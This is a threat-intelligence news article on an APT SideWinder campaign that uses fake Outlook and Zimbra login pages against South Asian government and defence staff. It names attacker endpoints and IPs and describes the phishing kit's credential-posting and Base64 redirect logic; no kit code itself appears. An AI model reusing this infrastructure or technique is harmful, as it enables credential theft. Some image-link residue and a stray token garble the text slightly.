APT SideWinder, a state-sponsored threat actor long associated with espionage across South Asia, has recently launched a campaign deploying phishing portals that mimic legitimate Outlook and Zimbra webmail services.
Emerging in mid-2025, this operation uses free hosting platforms such as Netlify, pages.dev, and workers.dev to serve fake login pages tailored to government and military targets in Pakistan, Nepal, Sri Lanka, Bangladesh, and Myanmar.
By exploiting maritime and defense-themed lure documents, SideWinder not only harvests user credentials via direct POST requests but also stages malware in exposed directories for subsequent retrieval.
Beginning in August 2025, Hunt.io telemetry observed rapid domain churn—new phishing sites appeared every three to five days—underscoring a high operational tempo.
Many pages spoofed the Directorate General of Defense Purchases (DGDP) in Bangladesh, offering “Secured File” portals that prompted victims for email credentials under the guise of accessing Turkish defense equipment details.
Concurrently, Nepal’s Ministry of Finance staff received invitations to view PDF decoys titled “सम्माननीय प्रधानमन्त्रीज्यूको चीन भ्रमण सम्बन्धमा.pdf,” which redirected to a counterfeit Outlook login hosted on Netlify (98.84.224.111).
.webp)
Hunt.io analysts noted the malware’s ability to blend social engineering with simple, effective credential collection.
In one SUPARCO-targeted site, JavaScript logic encodes the victim’s email in Base64 before redirecting to a secondary phishing page, then overlays a reload prompt to capture fresh inputs.
This staged redirection and obfuscation both tracks sessions and thwarts casual inspection.
.webp)
The infection mechanism underpinning these fake portals relies on direct form submissions to attacker-controlled servers rather than client-side malware payloads.
A typical HTML form observed in the SUPARCO phishing kit posts captured credentials to the endpoint https://technologysupport.help/1pac.php:-
The hidden inbox field carries a Base64-encoded address to correlate stolen credentials with specific campaigns.
Once harvested, these credentials feed into broader espionage workflows, granting SideWinder access to restricted networks or facilitating follow-on malware deployment from open directories at IPs such as 47.236.177.123 and 31.14.142.50.
By hosting portals on widely used, trusted platforms, SideWinder evades simple domain-based blocks and leverages rapid redeployment once URLs are taken down.
Countermeasures should include continuous monitoring of free hosting domains, advanced filtering of form POST requests to unknown servers, and user training to recognize document-based lures tied to login prompts. 开心 with network segmentation and enforced multi-factor authentication, organizations can limit credential-based intrusions even when phishing attempts succeed.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
